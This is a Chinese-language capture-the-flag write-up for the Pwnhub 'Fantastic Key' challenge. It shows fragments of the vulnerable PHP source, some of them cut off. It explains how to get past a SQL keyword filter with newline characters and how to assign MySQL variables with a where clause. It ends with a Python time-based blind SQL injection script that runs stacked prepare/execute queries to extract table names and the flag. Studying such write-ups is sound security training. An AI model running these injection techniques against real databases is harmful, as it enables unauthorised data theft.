Pwnhub Fantastic Key

https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247484074&idx=1&sn=2bcac1abf8364cc4040d2f3cb07e21d6&chksm=eadf9571dda81c678acffc2e79a4363d085e372428a14cb525e324c1e9e492a84d6d52b7d054&mpshare=1&scene=23&srcid=12167GnqMynTveY20gEIhScx&sharer_sharetime=1576496036398&sharer_shareid=ae6683d6c0e7df9a0b7c15e7cacf6b3c#rd
https://www.cnblogs.com/wfzWebSecuity/p/12049920.html

#index.php
query($sql)){
die('no such table');
}
$sql = "SELECT * FROM acg_{$v} where id = '$id'";
$result=$conn->query($sql);
if (!$result){
die('error');
}
foreach ($result as $row) {
print " \t";
print "$row[1]

"; }
#config.php
query('set names utf8');
function waf($s)
{
if (preg_match("/select|union|or|and|\.|\\\\| |\)|\'|\"|in|\*|-|do|set|case|regexp|like|prepare.|.execute|\/|#|\\0/i",$s)!=false||strlen($s)>10000)
    die();
return $s;
}
?>





key


看到PDO,不难想到可以利用堆叠注入+预处理来进行注入绕过。

但是问题是,题目中过滤了setprepare..execute,这就造成了很大的困扰。
首先prepare..execute应该是好绕的,因为如果是单纯的过滤,就不应该在正则中加.

虽然正则表达式中.代表的是任意字符,但是并不包括换行符,换行符是([\s\S]*))

所以只需要prepare%0a%0aexecute就可以绕过。同时空格被过滤也能通过%0a来进行绕过。

接下来先看看在哪里进行注入。题目中给出了两个值idv都可以插入到sql语句中,但是问题是id所在的语句是加了引号的,而引号是被过滤了的。所以我们看一下v所在的语句。

$sql="desc `acg_{$v}`";
$sql = "SELECT * FROM acg_{$v} where id = '$id'";

但是因为注释被过滤了,所以我们在上述第二个语句中无法将后面的where id='id'给注释掉,所以会产生语法错误。所以我们这里选择第一个语句。

trick1

我们发现在语句中通过反引号可以将原本报错的句子正常执行了
Pwnhub Fantastic Key_第1张图片
Pwnhub Fantastic Key_第2张图片

虽然反引号包起来的语句并不会影响原本语句的查询结果
Pwnhub Fantastic Key_第3张图片
但是它确实是执行了,这就够了。

trick2

这里回想到刚才的set过滤的问题还没有解决。其实mysql中除了用set来给变量赋值之外,还能用select来完成变量赋值。这里列举几个赋值的方法

  set @s='123';
  select '123' into @s;
  select @s:='123';
  do @s:='123';

可是select也被过滤了,这里我们就需要利用where来帮我们完成select的功能。如

Pwnhub Fantastic Key_第4张图片

这样我们就可以完成堆叠查询+预处理了。
payload如下:

import requests
import libnum

flag = ''
url = 'http://139.217.112.201/'
pos = 1

while True:
    for i in range(128):
        try:
            #sql = "select if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))=%d,sleep(4),1);" % (pos, i)
            #sql = "select if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='acg_fff5lll1ll@g'),%d,1))=%d,sleep(4),1);" % (pos, i)
            sql = "select if(ascii(substr((select flag from `acg_fff5lll1ll@g`),%d,1))=%d,sleep(4),1);" % (pos, i)
            data="v=anime`%0a`%0awhere%0a@zz:=0x"+sql.encode('hex')+";prepare%0ast%0afrom%0a@zz;%0aexecute%0ast;&i="
            re = requests.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"},timeout=2)
        except Exception, e:
            flag += chr(i)
            print flag
            break
    print "oops!"
    pos+=1

码力太弱了。。post里没有加headers,结果应该是没将%0a编码,一直出不了答案。其实代码中不用%0a\n一样的,但是问题是为什么还要加headers,难道是post都要加这个吗。。

你可能感兴趣的:(Pwnhub Fantastic Key)